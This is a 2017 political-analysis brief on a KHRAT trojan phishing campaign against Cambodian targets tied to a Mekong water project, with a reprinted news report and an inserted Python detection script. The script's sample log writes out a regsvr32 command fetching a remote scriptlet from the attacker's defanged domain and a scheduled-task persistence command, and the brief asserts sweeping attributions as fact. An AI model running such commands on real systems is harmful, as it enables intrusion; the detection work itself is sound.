Thayer Consultancy Background Briefing:
ABN # 65 648 097 123

Chinese Hackers Target Mekong River Commission
Carlyle A. Thayer
September 4, 2017

Recently there was a spearphishing/trojan attack in Cambodia that seemed to target individuals working on a World Bank project related to the Mekong River Commission (MRC). http://www.zdnet.com/article/khrat-trojan-sweeps-across-cambodia/ [See below for full report]
A cyber security expert said the hallmarks of this attack appear to link it to the
DragonOK campaign, which is funded by China.
Given that China is not all too fond of the MRC, is it reasonable to speculate that this
may have been an attack targeted at the MRC for geopolitical reasons related to
management of the river system? The scientific data collected by the MRC is highly
political, for many concerned parties it is evidence of the destructive nature of
hydropower development...
ANSWER: At the start of this year Chinese-directed phishing attacks against Cambodian citizens were reported. In mid-year these attacks were directed at opposition political parties.
Chinese hackers associated with DragonOK have been reported targeting high-end technology companies in Asia, such as in Japan and Taiwan.
Chinese hackers are either state supported or operate on behalf of Chinese
commercial interests.
The targeting of the Mekong River Commission suggests the following. China,
generally, prefers to purloin information rather than gather it directly if this method
is cheaper. Chinese hackers also are both discriminate and indiscriminate in their
targets. China gathers commercially useful information as a matter of course not least
of which is to give Chinese companies an edge in bidding or in negotiations with
foreign partners.
China set up the AIIB (Asia Infrastructure Investment Bank) after the U.S. reneged on
promises to change the voting weight in the World Bank in favour of the BRICS.
Chinese hackers would have multiple objectives: (1) identify weaknesses in software and cyber security, (2) acquire information that would be more costly to obtain by legitimate means, and (3) have the capability to mount a disabling cyberattack when the moment suited.
The bottom line is that China sanctions and engages in hacking as a matter of course. While some hacking is specific, other hacking efforts are designed just to gather information to expand files and databases.

KHRAT Trojan sweeps across Cambodia

The RAT has ramped up its technology and techniques to compromise victim PCs, but campaigns appear to have a political purpose.
The KHRAT Trojan has been spotted targeting citizens of Cambodia with new
capabilities and weaponry.
The Remote Access Trojan (RAT) has been in the wild for some time, but this year,
more modern variants have emerged.
According to Palo Alto Networks' Unit 42 security team, KHRAT is currently being used
by threat actors to target Cambodian citizens, with the overall aim of enslaving PCs,
stealing information including system language and IP address, and spying through the
use of keylogging, screenshots, and remote shell access.
In a blog post, the group said there has been an uptick in activity in recent months,
while the first surge against Cambodian victims was discovered back in June.
KHRAT is now being deployed through fresh spam and phishing campaigns, with
fraudulent emails containing weaponized attachments relating to the Mekong
Integrated Water Resources Management Project (MIWRMP), a million-dollar scheme
funded by the World Bank which is currently being deployed to improve water and
fisheries management in North Eastern Cambodia.
One malicious document used to spread the RAT is called "Mission Announcement
Letter for MIWRMP phase three implementation support mission, June 26-30,
2017(update).doc," which relates to the project in its current design stage.
The attachment, however, contacts a Russian IP address and uses the domain
update.upload-dropbox[.]com in order to dupe victims into believing they are
connecting to the legitimate Dropbox cloud storage service.
In addition, the malware was also hosted on the Cambodian Government's website at
a time the domain was compromised.
Once downloaded and opened, the crafted Word document then claims the user's
Office version isn't compatible, so they must click a link and permit macro content
which executes the Trojan.
KHRAT then deploys additional malicious code payloads, modifies the Windows
registry, and creates persistence by forcing Microsoft Word to re-execute the Trojan
should a document be reloaded from the most recently used document list.
The Trojan also masks its activities using the legitimate regsvr32.exe program,
schedules a range of innocent-looking tasks, and creates calling functions to run
JavaScript code.
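The tradecraft described in the paragraphs above (a macro-enabled Word document, regsvr32.exe used as cover, innocent-looking scheduled tasks, and a registry change that makes Word re-run the implant from its recent-files list) is exactly what an endpoint detection rule would key on. The following is an added example, not code from the ZDNet article or from Unit 42, that runs a few such rules over constructed process-creation and registry-write telemetry. The log format, the command lines, the use of a remote scriptlet with regsvr32 (the article only says regsvr32.exe is used as a mask) and the "File MRU" registry path are all assumptions made for the illustration.

```python
# Added example: rule-based triage of constructed endpoint telemetry for the
# KHRAT tradecraft the article describes (Office document -> regsvr32.exe ->
# scheduled task, plus a registry write near Word's recent-files list).
# Not Unit 42's or ZDNet's code; every command line, path and key below is
# constructed for illustration only.
import ntpath
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# LOLBins an Office process has little reason to spawn (assumption: a real
# deployment would tune this list against the environment's own baseline).
SUSPICIOUS_CHILDREN = {"regsvr32.exe", "schtasks.exe", "cmd.exe",
                       "powershell.exe", "wscript.exe", "mshta.exe"}

# regsvr32 fetching a scriptlet from a URL. The article only says KHRAT hides
# behind regsvr32.exe; that it does so this way is an assumption.
REMOTE_SCRIPTLET = re.compile(r"/i:\s*https?://|\.sct\b", re.IGNORECASE)
TASK_CREATE = re.compile(r"\bschtasks(\.exe)?\b.*\s/create\b", re.IGNORECASE)
# Hypothetical key path for Word's recent-files list under HKCU.
WORD_MRU = re.compile(r"\\Word\\File MRU\\", re.IGNORECASE)

# Constructed telemetry, pipe-delimited:
#   process|<parent image>|<image>|<command line>
#   registry|<writing process image>|<key>|<data>
SAMPLE_LOG = r"""process|C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|"WINWORD.EXE" "C:\Users\lim\Downloads\Mission Announcement Letter for MIWRMP phase three implementation support mission, June 26-30, 2017(update).doc"
process|C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|C:\Windows\System32\regsvr32.exe|regsvr32.exe /s /n /u /i:http://update.upload-dropbox[.]com/stage2.sct scrobj.dll
process|C:\Windows\System32\regsvr32.exe|C:\Windows\System32\schtasks.exe|schtasks.exe /create /sc minute /mo 30 /tn "MicrosoftUpdate" /tr "regsvr32.exe /s C:\Users\lim\AppData\Roaming\update.dll"
process|C:\Windows\explorer.exe|C:\Windows\System32\regsvr32.exe|regsvr32.exe /s "C:\Program Files\Vendor\codec.dll"
registry|C:\Windows\System32\regsvr32.exe|HKCU\Software\Microsoft\Office\16.0\Word\File MRU\Item 1|C:\Users\lim\AppData\Roaming\Microsoft\Templates\update.doc
registry|C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|HKCU\Software\Microsoft\Office\16.0\Word\File MRU\Item 1|C:\Users\lim\Documents\budget.docx
"""


def base(image: str) -> str:
    """Lower-cased file name of a Windows image path (works on any host OS)."""
    return ntpath.basename(image).lower()


def parse(line: str) -> dict:
    """Split one telemetry line into a dict keyed by event kind."""
    kind, a, b, c = line.rstrip("\n").split("|", 3)
    if kind == "process":
        return {"kind": kind, "parent": a, "image": b, "cmdline": c}
    if kind == "registry":
        return {"kind": kind, "image": a, "key": b, "data": c}
    raise ValueError(f"unknown event kind: {kind}")


def evaluate(ev: dict) -> list:
    """Return the names of every rule the event trips (empty if benign)."""
    hits = []
    if ev["kind"] == "process":
        parent, image, cmd = base(ev["parent"]), base(ev["image"]), ev["cmdline"]
        if parent in OFFICE_APPS and image in SUSPICIOUS_CHILDREN:
            hits.append("office_spawns_lolbin")
        if image == "regsvr32.exe" and REMOTE_SCRIPTLET.search(cmd):
            hits.append("regsvr32_remote_scriptlet")
        if image == "schtasks.exe" and TASK_CREATE.search(cmd):
            hits.append("scheduled_task_created")
    else:
        # Word itself legitimately updates its MRU; anything else touching it
        # is the persistence pattern the article describes.
        if WORD_MRU.search(ev["key"]) and base(ev["image"]) not in OFFICE_APPS:
            hits.append("word_mru_written_by_non_office")
    return hits


def triage(log_text: str) -> list:
    """Run every rule over every line; return (line number, rule) pairs."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        for rule in evaluate(parse(line)):
            findings.append((n, rule))
    return findings


if __name__ == "__main__":
    for n, rule in triage(SAMPLE_LOG):
        print(f"line {n}: {rule}")
```

Run as written, the script flags the Word-spawned regsvr32 twice (suspicious child, remote scriptlet), the schtasks /create, and the non-Office write to Word's MRU, while the two benign lines (a vendor DLL registered by explorer.exe and Word updating its own MRU) pass. In production the same logic is better expressed as a Sysmon or EDR query over parent/child pairs and registry events, with the child list and the MRU path checked against the organisation's own baseline.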
An interesting aspect of the Trojan found within the dropper code is a link to a blog
hosted on the Chinese Software Developer Network (CSDN) website which contains
an "almost identical" code sample of a click-tracking system in the malware.
"The JavaScript code in probe_sl.js uses a click-tracking technique, presumably so the
actors can monitor who is visiting their site," the researchers note. "It may also be an
attempt to control the distribution of later stage malware and tools, by only sending
it in response to requests from desired victims or vulnerable systems, and dropping
requests from others such as researchers."
Palo Alto Networks believes that the threat actors behind KHRAT have evolved the
Trojan to include targeted spear phishing and click-tracking in order to more
successfully target victims of interest in Cambodia.
Considering the political nature of the spear phishing emails, the campaigns may have
the purpose of spying on political rivals or disrupting political activity.
"This most recent campaign highlights social engineering techniques being used with
reference and great detail given to nationwide activities, likely to be forefront of
peoples' minds," the researchers say. "We believe this malware, the infrastructure
being used, and the TTPs (tactics, techniques, and procedures) highlight a more
sophisticated threat actor group, which we will continue to monitor closely."

Suggested citation: Carlyle A. Thayer, Chinese Hackers Target Mekong River Commission, Thayer Consultancy Background Brief, September 4, 2017. All background briefs are posted on Scribd.com (search for Thayer). To remove yourself from the mailing list type UNSUBSCRIBE in the Subject heading and hit the Reply key.

Thayer Consultancy provides political analysis of current regional security issues and
other research support to selected clients. Thayer Consultancy was officially
registered as a small business in Australia in 2002.